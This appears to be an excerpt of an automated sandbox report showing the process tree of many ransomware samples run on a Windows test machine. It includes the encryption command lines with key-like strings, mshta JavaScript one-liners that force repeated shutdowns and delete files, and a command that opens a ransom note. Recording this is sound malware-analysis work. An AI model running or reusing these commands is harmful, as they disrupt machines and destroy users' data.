                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.Run('cmd.exe /c for %o in (\x22-s -f -t 0\x22;\x22/s /f /t 0\x22) do shutdown %~o',0);close()}catch(e){}},5000);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('database.exe');close()}catch(e){}},10);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe');close()}catch(e){}},10);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
